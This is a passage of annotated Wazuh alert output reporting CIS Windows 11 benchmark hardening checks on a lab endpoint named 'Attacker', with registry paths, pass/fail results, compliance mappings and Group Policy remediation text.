data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26288
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off cloud optimized content' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting turns off cloud optimized content in all Windows experiences. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Due to privacy concerns, data should never be sent to any 3rd party since this data could contain sensitive information.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Cloud Content\Turn off cloud optimized content. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CloudContent.admx/adml that is included with the Microsoft Windows 10 Release 20H2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.14.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CloudContent']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud consumer account state content' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud consumer account state content' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.617+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.617+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud consumer account state content' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.14.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2507226
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26287
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off cloud consumer account state content' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines whether cloud consumer account state content is allowed in all Windows experiences. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The use of consumer accounts in an enterprise managed environment is not good security practice as it could lead to possible data leakage.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Cloud Content\Turn off cloud consumer account state content. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CloudContent.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.14.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CloudContent']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Microsoft consumer experiences' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Microsoft consumer experiences' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.628+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.628+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Microsoft consumer experiences' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.14.3']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2510242
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26289
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off Microsoft consumer experiences' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting turns off experiences that help consumers make the most of their devices and Microsoft account. The recommended state for this setting is: Enabled. Note: Per Microsoft TechNet, this policy setting only applies to Windows 10 Enterprise and Windows 10 Education editions.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Having apps silently install in an enterprise managed environment is not good security practice - especially if the apps send data back to a 3rd party.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Cloud Content\Turn off Microsoft consumer experiences. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CloudContent.admx/adml that is included with the Microsoft Windows 10 Release 1511 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.14.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  SC.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CloudContent']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.644+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.644+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.15.1']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2513822
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26290
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether or not a PIN is required for pairing to a wireless display device. The recommended state for this setting is: Enabled: First Time OR Enabled: Always.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If this setting is not configured or disabled then a PIN would not be required when pairing wireless display devices to the system, increasing the risk of unauthorized use.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: First Time OR Enabled: Always: Computer Configuration\Policies\Administrative Templates\Windows Components\Connect\Require pin for pairing. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WirelessDisplay.admx/adml that is included with the Microsoft Windows 10 Release 1607 & Server 2016 Administrative Templates (or newer). The new Choose one of the following actions sub-option was later added as of the Windows 10 Release 1809 Administrative Templates. Choosing Enabled in the older templates is the equivalent of choosing Enabled: First Time in the newer templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.15.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  SC.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Connect']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not display the password reveal button' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not display the password reveal button' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.660+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.660+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not display the password reveal button' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '8.2.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.16.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2517794
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26291
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Do not display the password reveal button' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to configure the display of the password reveal button in password entry user experiences. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  This is a useful feature when entering a long and complex password, especially when using a touchscreen. The potential risk is that someone else may see your password while surreptitiously observing your screen.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Credential User Interface\Do not display the password reveal button. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CredUI.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.16.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  8.2.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredUI']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enumerate administrator accounts on elevation' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enumerate administrator accounts on elevation' is set to 'Disabled'.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:50:09.675+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.675+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enumerate administrator accounts on elevation' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '8.2.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.16.2']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2521028
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26292
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Enumerate administrator accounts on elevation' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether administrator accounts are displayed when a user attempts to elevate a running application. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Users could see the list of administrator accounts, making it slightly easier for a malicious user who has logged onto a console session to try to crack the passwords of those accounts.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Credential User Interface\Enumerate administrator accounts on elevation. Note: This Group Policy path is provided by the Group Policy template CredUI.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.16.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  8.2.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\CredUI']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.692+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.692+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.16.3']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2524241
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26293
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Prevent the use of security questions for local accounts' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether security questions can be used to reset local account passwords. The security question feature does not apply to domain accounts, only local accounts on the workstation. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Users could establish security questions that are easily guessed or sleuthed by observing the user’s social media accounts, making it easier for a malicious actor to change the local user account password and gain access to the computer as that user account.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Credential User Interface\Prevent the use of security questions for local accounts. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CredUI.admx/adml that is included with the Microsoft Windows 10 Release 1903 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.16.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.705+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.705+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

